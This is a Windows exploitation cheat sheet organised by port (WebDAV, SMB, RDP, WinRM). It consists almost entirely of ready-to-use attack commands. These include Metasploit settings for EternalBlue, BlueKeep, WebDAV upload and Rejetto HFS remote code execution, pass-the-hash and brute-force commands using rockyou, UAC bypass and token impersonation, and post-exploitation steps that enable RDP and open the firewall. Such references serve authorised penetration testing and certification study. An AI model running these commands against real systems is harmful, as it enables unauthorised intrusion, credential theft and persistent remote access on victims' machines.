Windows Exploitation
80 - WebDAV (IIS)
| Command | Description |
|---|---|
nmap --script http-webdav-scan,http-methods -p 80 <IP> | Check if WebDAV is enabled and what methods are allowed. |
davtest -url http://<IP>/webdav/ | Test which file types can be uploaded via WebDAV. |
cadaver http://<IP>/webdav/ | Interactive WebDAV client. |
# MSF - WebDAV file upload exploit
use exploit/windows/iis/iis_webdav_upload_asp
set RHOSTS <IP>
set PATH /webdav/shell.asp
runHFS (Rejetto)
use exploit/windows/http/rejetto_hfs_exec
set RHOSTS <IP>
set LHOST <kali_IP>
run445 - SMB
EternalBlue (MS17-010)
# Check vulnerability
nmap -p 445 --script smb-vuln-ms17-010 <IP>
# MSF - exploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <IP>
set LHOST <kali_IP>
runPsExec
# MSF - PsExec with credentials
use exploit/windows/smb/psexec
set RHOSTS <IP>
set SMBUser administrator
set SMBPass <password>
set LHOST <kali_IP>
run
# Using impacket
impacket-psexec administrator:<password>@<IP>
# Pass-the-hash with PsExec
impacket-psexec administrator@<IP> -hashes :<NTLM_hash>
crackmapexec smb <IP> -u administrator -H <NTLM_hash> -x "whoami"Brute Force
| Command | Description |
|---|---|
crackmapexec smb <IP> -u administrator -p /usr/share/wordlists/rockyou.txt | Password spray against a single user. |
crackmapexec smb <IP> -u users.txt -p passwords.txt --no-bruteforce | Test credential pairs (one-to-one). |
hydra -l administrator -P /usr/share/wordlists/rockyou.txt smb://<IP> | Hydra SMB brute force. |
use auxiliary/scanner/smb/smb_login
set RHOSTS <IP>
set SMBUser administrator
set PASS_FILE /usr/share/wordlists/rockyou.txt
runPass-the-Hash
| Command | Description |
|---|---|
crackmapexec smb <IP> -u administrator -H <NTLM_hash> | SMB authentication with NTLM hash. |
crackmapexec smb <IP> -u administrator -H <NTLM_hash> --shares | List shares via PTH. |
smbclient //<IP>/<share> -U administrator%<NTLM_hash> --pw-nt-hash | Connect to share with NTLM hash. |
3389 - RDP
| Command | Description |
|---|---|
nmap -p 3389 --script rdp-enum-encryption <IP> | Check RDP encryption level. |
hydra -l administrator -P /usr/share/wordlists/rockyou.txt rdp://<IP> | Hydra RDP brute force. |
crowbar -b rdp -s <IP>/32 -U users.txt -c password123 | Password spray against RDP. |
xfreerdp /v:<IP> /u:<user> /p:<pass> | Connect to RDP from Linux. |
xfreerdp /v:<IP> /u:administrator /pth:<NTLM_hash> | RDP pass-the-hash (requires Restricted Admin mode). |
rdesktop -u <user> -p <pass> <IP> | Alternative RDP client. |
# MSF - BlueKeep (CVE-2019-0708) - RDP pre-auth RCE
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS <IP>
set LHOST <kali_IP>
run5985 - WinRM
| Command | Description |
|---|---|
nmap -p 5985,5986 <IP> | Check WinRM ports (HTTP=5985, HTTPS=5986). |
crackmapexec winrm <IP> -u administrator -p <pass> | Test credentials via WinRM. |
crackmapexec winrm <IP> -u administrator -H <NTLM_hash> | Pass-the-hash via WinRM. |
crackmapexec winrm <IP> -u administrator -p /usr/share/wordlists/rockyou.txt | WinRM password brute force. |
evil-winrm -i <IP> -u administrator -p <pass> | Interactive WinRM shell. |
evil-winrm -i <IP> -u administrator -H <NTLM_hash> | WinRM shell via PTH. |
# MSF - WinRM brute force, opens a session directly on success
use auxiliary/scanner/winrm/winrm_login
set RHOSTS <IP>
set USERNAME administrator
set PASS_FILE /usr/share/wordlists/rockyou.txt
run
# Note: may produce false positives through SOCKS proxy - verify with crackmapexec
# On success: sessions -i <id>
use exploit/windows/winrm/winrm_script_exec
set RHOSTS <IP>
set USERNAME administrator
set PASSWORD <pass>
runWindows Privilege Escalation
getsystem (Meterpreter)
meterpreter > getsystem
# Attempts multiple techniques: named pipe impersonation, token duplicationUAC Bypass
# MSF - UAC bypass via memory injection
use exploit/windows/local/bypassuac_injection
set SESSION <id>
set TARGET Windows\ x64
run
# MSF - UACMe
use exploit/windows/local/bypassuac
set SESSION <id>
runToken Impersonation (Incognito)
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"Post-Exploitation Quick Reference
# Basic recon from shell
whoami
whoami /priv
net user
net localgroup administrators
systeminfo
ipconfig /all
arp -a
netstat -ano# Enable RDP if disabled
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall add rule name="RDP" protocol=TCP dir=in localport=3389 action=allow